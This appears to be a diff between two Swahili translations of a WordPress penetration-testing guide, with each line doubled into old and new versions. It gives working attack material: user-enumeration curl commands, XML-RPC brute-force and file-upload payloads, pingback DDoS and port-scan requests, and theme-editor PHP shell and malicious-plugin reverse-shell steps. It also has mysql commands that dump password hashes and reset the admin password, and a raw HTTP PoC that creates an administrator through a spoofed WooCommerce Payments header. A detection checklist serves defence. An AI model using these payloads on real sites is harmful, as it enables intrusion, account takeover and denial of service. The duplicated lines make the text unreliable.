Labda hautaweza kupata Plugins na Themes zote zinazowezekana. Ili kugundua zote, utahitaji **Brute Force kwa vitendo orodha ya Plugins na Themes** (kwa bahati nzuri kwetu zipo zana za kiotomatiki ambazo zina orodha hizi). Huenda hautaweza kupata Plugins na Themes zote zinazowezekana. Ili kuzitambua zote, utahitaji **actively Brute Force a list of Plugins and Themes** (tumaini letu ni kwamba kuna zana za otomatiki zinazoshikilia orodha hizi).
### Watumiaji ### Watumiaji
- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing IDs za watumiaji: - **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing users IDs:
```bash ```bash
curl -s -I -X GET http://blog.example.com/?author=1 curl -s -I -X GET http://blog.example.com/?author=1
``` ```
Ikiwa majibu ni **200** au **30X**, hiyo ina maana kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id si **halali**. Ikiwa majibu ni **200** au **30X**, hiyo ina maana kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
- **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza: - **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:
```bash ```bash
curl http://blog.example.com/wp-json/wp/v2/users curl http://blog.example.com/wp-json/wp/v2/users
``` ```
Endpoint nyingine ya `/wp-json/` ambayo inaweza kufichua baadhi ya taarifa kuhusu watumiaji ni: Endpoint mwingine wa `/wp-json/` ambao unaweza kufunua taarifa fulani kuhusu watumiaji ni:
```bash ```bash
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
``` ```
Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliofanya chapisho. **Taarifa tu kuhusu watumiaji ambao wamewezeshwa na kipengele hiki ndizo zitatolewa**. Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliofanya chapisho. **Taarifa tu kuhusu watumiaji ambao kipengele hiki kimewezeshwa zitatolewa**.
Pia kumbuka kwamba **/wp-json/wp/v2/pages** inaweza leak anwani za IP. Pia kumbuka kuwa **/wp-json/wp/v2/pages** inaweza leak IP addresses.
- **Login username enumeration**: Unapojaribu kuingia kwenye **`/wp-login.php`**, **ujumbe** ni **tofauti** ikionyesha kama **jina la mtumiaji lipo au halipo**. - **Login username enumeration**: Unapoingia kwenye **`/wp-login.php`**, ujumbe ni tofauti kulingana na kama username iliyotajwa ipo au la.
### XML-RPC ### XML-RPC
Ikiwa `xml-rpc.php` iko hai unaweza kufanya credentials brute-force au kuitumia kuanzisha DoS attacks kwa rasilimali nyingine. (Unaweza ku-automate mchakato huu[ using this](https://github.com/relarizky/wpxploit) kwa mfano). Ikiwa `xml-rpc.php` iko active unaweza kufanya credentials brute-force au kuitumia kuanzisha mashambulizi ya DoS kwa rasilimali nyingine. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
To see if it is active try to access to _**/xmlrpc.php**_ and send this request: Ili kuona kama iko active, jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili:
**Angalia** **Angalia**
```html ```html
@ -122,7 +122,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
**Credentials Bruteforce** **Credentials Bruteforce**
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force credentials. Ikiwa unaweza kupata yoyote yao, unaweza kutuma kitu kama: **`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force kwa credentials. Ikiwa unaweza kupata yoyote yao unaweza kutuma kitu kama:
```html ```html
<methodCall> <methodCall>
<methodName>wp.getUsersBlogs</methodName> <methodName>wp.getUsersBlogs</methodName>
@ -132,13 +132,13 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
</params> </params>
</methodCall> </methodCall>
``` ```
Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya response ya code 200 unapaswa kuonekana ikiwa credentials sio halali. Ujumbe _"Incorrect username or password"_ ndani ya 200 code response unapaswa kuonekana ikiwa credentials hazitakuwa sahihi.
![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>) ![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../images/image (721).png>) ![](<../../images/image (721).png>)
Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982)) Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response path itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
```html ```html
<?xml version='1.0' encoding='utf-8'?> <?xml version='1.0' encoding='utf-8'?>
<methodCall> <methodCall>
@ -168,18 +168,18 @@ Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response njia itaon
</params> </params>
</methodCall> </methodCall>
``` ```
Pia kuna **njia ya haraka** ya kufanya brute-force ya jina la mtumiaji na nywila kwa kutumia **`system.multicall`**, kwani unaweza kujaribu vigezo vingi kwenye ombi moja: Pia kuna njia ya haraka zaidi ya brute-force credentials ukitumia **`system.multicall`** kwani unaweza kujaribu credentials kadhaa kwenye ombi moja:
<figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
**Bypass 2FA** **Bypass 2FA**
Njia hii imelengwa kwa programu, si kwa watu, na ni ya zamani; kwa hiyo haiungi mkono 2FA. Hivyo, ikiwa una creds halali lakini mlango mkuu umehifadhiwa na 2FA, **inawezekana utaweza kutumia xmlrpc.php kuingia kwa kutumia creds hizo ukiepuka 2FA**. Kumbuka hautaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s) Njia hii imetengenezwa kwa programs na si za wanadamu, na ni ya zamani, kwa hivyo haitegemei 2FA. Kwa hivyo, ikiwa una valid creds lakini mlango kuu umehifadhiwa kwa 2FA, **unaweza kuabusu xmlrpc.php ku-login kwa kutumia hao creds na kupita 2FA**. Kumbuka kuwa hutaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
**DDoS or port scanning** **DDoS or port scanning**
Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\ Ikiwa utaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\
Hii inaweza kutumika kuagiza **maelfu** za Wordpress **tovuti** **kuingia** eneo moja (hivyo kusababisha **DDoS** katika eneo hilo) au unaweza kuitumia kufanya **Wordpress** ili **scan** baadhi ya mitandao ya ndani (unaweza kubainisha bandari yoyote). Hii inaweza kutumika kuomba **maelfu** ya Wordpress **sites** ku**access** eneo moja (hivyo kusababisha **DDoS** eneo hilo) au unaweza kuitumia kufanya **Wordpress** i**scan** baadhi ya **internal network** (unaweza kuonyesha port yoyote).
```html ```html
<methodCall> <methodCall>
<methodName>pingback.ping</methodName> <methodName>pingback.ping</methodName>
@ -191,9 +191,9 @@ Hii inaweza kutumika kuagiza **maelfu** za Wordpress **tovuti** **kuingia** eneo
``` ```
![](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png) ![](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
Ikiwa unapata **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana bandari iko wazi. Ikiwa unapata **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana port iko wazi.
Angalia matumizi ya **`system.multicall`** katika sehemu ya awali ili kujifunza jinsi ya kutumia vibaya njia hii kusababisha DDoS. Angalia matumizi ya `system.multicall` katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha **DDoS**.
**DDoS** **DDoS**
```html ```html
@ -209,17 +209,17 @@ Angalia matumizi ya **`system.multicall`** katika sehemu ya awali ili kujifunza
### wp-cron.php DoS ### wp-cron.php DoS
Faili hii kawaida hupatikana chini ya mizizi ya tovuti ya Wordpress: **`/wp-cron.php`**\ Faili hii kawaida huiwepo chini ya root ya Wordpress site: **`/wp-cron.php`**\
Wakati faili hii inapofikiwa hufanywa MySQL **query** ya **"nzito"**, hivyo inaweza kutumiwa na **attackers** **kusababisha** **DoS**.\ Wakati faili hii ikiwa **accessed** hufanyika "**heavy**" MySQL **query**, hivyo inaweza kutumiwa na **attackers** kusababisha **DoS**.\
Pia, kwa chaguo-msingi, `wp-cron.php` huitwa kila inapopakiwa ukurasa (wakati wowote mteja anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS). Pia, kwa default, `wp-cron.php` huitwa kila page load (kila mara client anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye maeneo yenye trafiki kubwa linaweza kusababisha matatizo (DoS).
Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya seva itakayotekeleza vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo). Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host ili ifanye vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
### /wp-json/oembed/1.0/proxy - SSRF ### /wp-json/oembed/1.0/proxy - SSRF
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma ombi kwako. Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma request kwako.
This is the response when it doesn't work: Hii ndiyo response inapotakuwa haifanyi kazi:
![](<../../images/image (365).png>) ![](<../../images/image (365).png>)
@ -230,24 +230,24 @@ This is the response when it doesn't work:
https://github.com/t0gu/quickpress/blob/master/core/requests.go https://github.com/t0gu/quickpress/blob/master/core/requests.go
{{#endref}} {{#endref}}
Chombo hiki hukagua kama **methodName: pingback.ping** ipo na kama path **/wp-json/oembed/1.0/proxy** upo; ikiwa zipo, kinajaribu kuzitumia (exploit). Tool hii inakagua kama **methodName: pingback.ping** ipo na pia path **/wp-json/oembed/1.0/proxy**, na ikiwa zipo, inajaribu kuzi-exploit.
## Zana za Kiotomatiki ## Zana za Otomatiki
```bash ```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0" cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs) wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin" #You can try to bruteforce the admin user using wpscan with "-U admin"
``` ```
## Pata ufikiaji kwa kubadilisha biti ## Pata ufikiaji kwa kubadilisha bit
Zaidi ya kuwa shambulio la kweli, hili ni udadisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) unaweza kubadilisha biti 1 kutoka kwa faili yoyote ya wordpress. Kwa hivyo unaweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kufanya operesheni ya NOT (`!`) kuwa NOP. Hii ni zaidi ya udadisi kuliko shambulio halisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) ulikuwa unaweza kugeuza 1 bit kutoka kwa faili yoyote ya wordpress. Kwa hivyo ungeweza kugeuza nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kuifanya operesheni ya NOT (`!`) kuwa NOP.
```php ```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) { if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error( return new WP_Error(
``` ```
## **Paneli RCE** ## **RCE ya Paneli**
**Kurekebisha php kutoka kwenye theme inayotumika (inahitaji kredensiali za admin)** **Kubadilisha faili ya php ya theme inayotumika (inahitaji nyaraka za admin)**
Appearance → Theme Editor → 404 Template (kwa upande wa kulia) Appearance → Theme Editor → 404 Template (kwa upande wa kulia)
@ -255,7 +255,7 @@ Badilisha yaliyomo kwa php shell:
![](<../../images/image (384).png>) ![](<../../images/image (384).png>)
Tafuta mtandaoni jinsi unaweza kufikia ukurasa uliosasishwa. Katika kesi hii, unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa. Katika kesi hii unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
### MSF ### MSF
@ -269,8 +269,8 @@ kupata session.
### PHP plugin ### PHP plugin
Inawezekana kupakia .php files kama plugin.\ Inaweza kuwa inawezekana kupakia faili za .php kama plugin.\
Tengeneza php backdoor yako kwa mfano: Unda PHP backdoor yako kwa mfano:
![](<../../images/image (183).png>) ![](<../../images/image (183).png>)
@ -278,82 +278,82 @@ Kisha ongeza plugin mpya:
![](<../../images/image (722).png>) ![](<../../images/image (722).png>)
Pakia plugin na bonyeza Install Now: Pakia plugin kisha bonyeza Install Now:
![](<../../images/image (249).png>) ![](<../../images/image (249).png>)
Bonyeza Procced: Bonyeza Proceed:
![](<../../images/image (70).png>) ![](<../../images/image (70).png>)
Inawezekana hili halitaonekana kufanya chochote, lakini ukitembelea Media, utaona shell yako imepakwa: Huenda hii isifanye chochote kwa dhati, lakini ukienda Media, utaona shell yako imepakiwa:
![](<../../images/image (462).png>) ![](<../../images/image (462).png>)
Ifikie na utaona URL ya kuendesha reverse shell: Fikia hiyo na utaona URL ya kutekeleza reverse shell:
![](<../../images/image (1006).png>) ![](<../../images/image (1006).png>)
### Uploading and activating malicious plugin ### Uploading and activating malicious plugin
Njia hii inahusisha usakinishaji wa plugin yenye madhara inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo: Njia hii inahusisha usakinishaji wa malicious plugin inayojulikana kuwa vulnerable na inaweza kutumiwa kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo:
1. **Plugin Acquisition**: Plugin hupatikana kutoka chanzo kama Exploit DB like [**here**](https://www.exploit-db.com/exploits/36374). 1. **Plugin Acquisition**: Plugin hupatikana kutoka kwenye chanzo kama Exploit DB kama [**here**](https://www.exploit-db.com/exploits/36374).
2. **Plugin Installation**: 2. **Plugin Installation**:
- Nenda kwenye WordPress dashboard, kisha nenda kwa `Dashboard > Plugins > Upload Plugin`. - Navigate to the WordPress dashboard, then go to `Dashboard > Plugins > Upload Plugin`.
- Pakia faili la zip la plugin ulilopakua. - Upload the zip file of the downloaded plugin.
3. **Plugin Activation**: Mara plugin itakapowekwa kwa mafanikio, lazima iwe imewezeshwa kupitia dashboard. 3. **Plugin Activation**: Mara plugin inapowekwa kwa mafanikio, lazima iamishwe kupitia dashboard.
4. **Exploitation**: 4. **Exploitation**:
- Ukiwa na plugin "reflex-gallery" imewekwa na imewezeshwa, inaweza kutumika kwani inajulikana kuwa na udhaifu. - With the plugin "reflex-gallery" installed and activated, it can be exploited as it is known to be vulnerable.
- Metasploit framework inatoa exploit kwa udhaifu huu. Kwa kupakia module inayofaa na kutekeleza amri maalum, meterpreter session inaweza kuanzishwa, ikitoa ufikiaji usioidhinishwa kwenye tovuti. - The Metasploit framework provides an exploit for this vulnerability. By loading the appropriate module and executing specific commands, a meterpreter session can be established, granting unauthorized access to the site.
- Imetajwa kwamba hii ni mojawapo ya njia nyingi za kutumia udhaifu wa tovuti ya WordPress. - It's noted that this is just one of the many methods to exploit a WordPress site.
Yaliyomo yanajumuisha picha zinazoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na haifai bila idhini sahihi. Taarifa hizi zinapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama penetration testing na idhini wazi. Yaliyomo yanajumuisha msaada wa kuona unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kuelewa kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na si ya maadili bila idhini stahiki. Taarifa hizi zitumike kwa uwajibikaji na tu katika muktadha halali, kama pentesting kwa idhini dhahiri.
**For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/) **For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
## From XSS to RCE ## Kutoka XSS hadi RCE
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua uvujaji wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au udhaifu mwingine mzito katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:** - [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kukuza **Cross-Site Scripting (XSS)** vulnerability hadi **Remote Code Execution (RCE)** au vunja usalama mwingine hatari katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa msaada kwa WordPress Versions 6.X.X, 5.X.X na 4.X.X na inaruhusu:
- _**Privilege Escalation:**_ Huunda mtumiaji ndani ya WordPress. - _**Privilege Escalation:**_ Creates an user in WordPress.
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia custom plugin yako (backdoor) kwenye WordPress. - _**(RCE) Custom Plugin (backdoor) Upload:**_ Upload your custom plugin (backdoor) to WordPress.
- _**(RCE) Built-In Plugin Edit:**_ Hariri Built-In Plugins katika WordPress. - _**(RCE) Built-In Plugin Edit:**_ Edit a Built-In Plugins in WordPress.
- _**(RCE) Built-In Theme Edit:**_ Hariri Built-In Themes katika WordPress. - _**(RCE) Built-In Theme Edit:**_ Edit a Built-In Themes in WordPress.
- _**(Custom) Custom Exploits:**_ Custom Exploits kwa Third-Party WordPress Plugins/Themes. - _**(Custom) Custom Exploits:**_ Custom Exploits for Third-Party WordPress Plugins/Themes.
## Post Exploitation ## Post Exploitation
Chukua majina ya watumiaji na nywila: Chota usernames na passwords:
```bash ```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;" mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
``` ```
Badilisha admin password: Badilisha password ya admin:
```bash ```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;" mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
``` ```
## Wordpress Plugins Pentest ## Wordpress Plugins Pentest
### Uso wa Mashambulizi ### Attack Surface
Kujua jinsi plugin ya Wordpress inaweza kuweka wazi utendakazi ni muhimu ili kupata udhaifu katika utendakazi wake. Unaweza kuona jinsi plugin inaweza kuweka wazi utendakazi katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/). Kujua jinsi Wordpress plugin inavyoweza kufichua functionality ni muhimu ili kupata vulnerabilities kwenye functionality yake. Unaweza kuona jinsi plugin inaweza kufichua functionality katika pointi zifuatazo na baadhi ya mifano ya vulnerable plugins katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
- **`wp_ajax`** - **`wp_ajax`**
Moja ya njia plugin inaweza kufichua functions kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na bugs za logic, authorization, au authentication. Aidha, mara nyingi functions hizi zitategemea authentication na authorization kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yeyote aliye-authenticated kwenye instance ya Wordpress anaweza kuwa nayo** (hata bila kuzingatia jukumu lake). Mojawapo ya njia plugin inaweza kufichua functions kwa users ni kupitia AJAX handlers. Hizi zinaweza kuwa na logic, authorization, au authentication bugs. Zaidi ya hayo, mara nyingi hizi functions zitategemea authentication na authorization kwa kuwepo kwa Wordpress nonce ambayo **any user authenticated in the Wordpress instance might have** (independently of its role).
Hizi ni functions ambazo zinaweza kutumika kufichua function katika plugin: Hizi ni functions ambazo zinaweza kutumika kufichua function katika plugin:
```php ```php
add_action( 'wp_ajax_action_name', array(&$this, 'function_name')); add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name')); add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
``` ```
**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wasiothibitishwa).** **Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasio na uthibitisho).**
> [!CAUTION] > [!CAUTION]
> Zaidi ya hayo, ikiwa function inachunguza tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia; kwa kawaida haitambui jukumu la mtumiaji. Kwa hivyo watumiaji wenye ruhusa ndogo wanaweza kufanya vitendo vinavyohitaji ruhusa za juu. > Zaidi ya hayo, ikiwa function inachunguza idhini ya mtumiaji kwa kutumia function `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia, na kawaida haiangalii cheo la mtumiaji. Kwa hivyo watumiaji wenye ruhusa ndogo wanaweza kupata ufikiaji wa vitendo vyenye ruhusa kubwa.
- **REST API** - **REST API**
Pia inawezekana kufunua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`: Inawezekana pia kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`:
```php ```php
register_rest_route( register_rest_route(
$this->namespace, '/get/', array( $this->namespace, '/get/', array(
@ -363,21 +363,21 @@ $this->namespace, '/get/', array(
) )
); );
``` ```
The `permission_callback` ni callback kwa function inayothibitisha ikiwa mtumiaji fulani ameidhinishwa kuita API method. The `permission_callback` ni callback ya kazi inayokagua ikiwa mtumiaji aliyotajwa ameidhinishwa kuita njia ya API.
**Ikiwa function iliyojengwa ndani `__return_true` itatumika, itapita tu ukaguzi wa ruhusa za mtumiaji.** **Ikiwa kazi ya ndani ya kujengwa `__return_true` itatumiwa, itapita tu ukaguzi wa ruhusa za mtumiaji.**
- **Ufikiaji wa moja kwa moja wa faili ya php** - **Ufikiaji wa moja kwa moja wa faili la php**
Kama kawaida, Wordpress inatumia PHP na faili ndani ya plugin zinaweza kupatikana moja kwa moja kupitia wavuti. Kwa hivyo, ikiwa plugin inafichua utendaji wenye udhaifu unaozinduliwa kwa kuingia tu kwenye faili, mtumiaji yeyote ataweza kuutumia. Hakika, Wordpress inatumia PHP na faili ndani ya plugins zinaweza kupatikana moja kwa moja kutoka kwenye wavuti. Hivyo, endapo plugin inaonyesha utendaji wenye udhaifu unaochochewa tu kwa kufungua faili hilo, utakuwa rahisi kutumiwa na mtumiaji yeyote.
### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1) ### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
Baadhi ya plugins zinafanya “trusted header” shortcuts kwa ajili ya internal integrations au reverse proxies na kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haitafungwi cryptographically na sehemu ya juu (upstream component), mshambuliaji anaweza kuiga (spoof) na kufikia routes za REST zenye ruhusa kama administrator. Baadhi ya plugins hutekeleza “trusted header” njia za mkato kwa integrasiyo za ndani au reverse proxies kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haifungwi kwa njia ya kriptografia kwenye ombi na sehemu ya juu, mshambuliaji anaweza kuifanya spoof na kufikia routes za REST zenye marufuku kama administrator.
- Athari: kuinuka kwa mamlaka bila uthibitisho hadi admin kwa kuunda msimamizi mpya kupitia core users REST route. - Athari: kuinuka kwa ruhusa bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inafanya user ID 1, kawaida akaunti ya msimamizi wa kwanza). - Mfano wa header: `X-Wcpay-Platform-Checkout-User: 1` (lazimisha user ID 1, kawaida akaunti ya kwanza ya administrator).
- Exploited route: `POST /wp-json/wp/v2/users` kwa role array yenye ruhusa za juu. - Njia iliyotumiwa: `POST /wp-json/wp/v2/users` na array ya role iliyoongezwa.
PoC PoC
```http ```http
@ -391,31 +391,31 @@ Content-Length: 114
{"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]} {"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}
``` ```
Kwa nini inafanya kazi Why it works
- Plugin inaweka header inayodhibitiwa na mteja kwenye authentication state na inaruka capability checks. - Plugin inamepanga header inayodhibitiwa na mteja kwenye hali ya uthibitisho na inapuuza ukaguzi wa capability.
- WordPress core inatarajia `create_users` capability kwa route hii; hack ya plugin inaitikisa kwa kuweka moja kwa moja current user context kutoka kwenye header. - Msingi wa WordPress unatarajia `create_users` capability kwa route hii; hack ya plugin inalipa kizuizi hicho kwa kuweka moja kwa moja muktadha wa mtumiaji wa sasa kutoka kwa header.
Viashiria vya mafanikio vinavyotarajiwa Expected success indicators
- HTTP 201 na mwili wa JSON unaelezea user iliyoundwa. - HTTP 201 with a JSON body describing the created user.
- Mtumiaji mpya wa admin unaoonekana katika `wp-admin/users.php`. - Mtumiaji mpya wa admin anaonekana katika `wp-admin/users.php`.
Orodha ya kugundua Detection checklist
- Tumia grep kutafuta `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosasisha custom headers kuweka user context (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`). - Grep for `getallheaders()`, `$_SERVER['HTTP_...']`, or vendor SDKs that read custom headers to set user context (e.g., `wp_set_current_user()`, `wp_set_auth_cookie()`).
- Pitia REST registrations kwa privileged callbacks ambazo hazina ukaguzi imara wa `permission_callback` na badala yake zinategemea request headers. - Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers.
- Tazama matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinalindwa tu kwa thamani za header. - Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values.
### Kuondolewa kwa faili bila uthibitisho kupitia wp_ajax_nopriv (Litho Theme <= 3.0) ### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
Themes na plugins za WordPress mara nyingi hutoa AJAX handlers kupitia hooks `wp_ajax_` na `wp_ajax_nopriv_`. Wakati toleo la **_nopriv_** linapotumiwa **callback inakuwa inafikiwa na wageni wasioingia**, kwa hivyo kitendo chochote nyeti kinapaswa pia kutekeleza: Mandhari na plugins za WordPress mara nyingi huweka wazi AJAX handlers kupitia hooks `wp_ajax_` na `wp_ajax_nopriv_`. Wakati toleo **_nopriv_** linapotumika **callback inakuwa inafikiwa na wageni wasio na uthibitisho**, kwa hivyo kitendo chochote nyeti kinapaswa pia kutekelezwa:
1. Ukaguzi wa **capability** (mf. `current_user_can()` au angalau `is_user_logged_in()`), na 1. Ukaguzi wa **capability** (mfano `current_user_can()` au angalau `is_user_logged_in()`), na
2. **CSRF nonce** iliyoathibitishwa na `check_ajax_referer()` / `wp_verify_nonce()`, na 2. CSRF nonce iliyothibitishwa kwa `check_ajax_referer()` / `wp_verify_nonce()`, na
3. **Usafishaji / uthibitishaji mkali wa input**. 3. **Uchujaji / uthibitishaji madhubuti wa ingizo**.
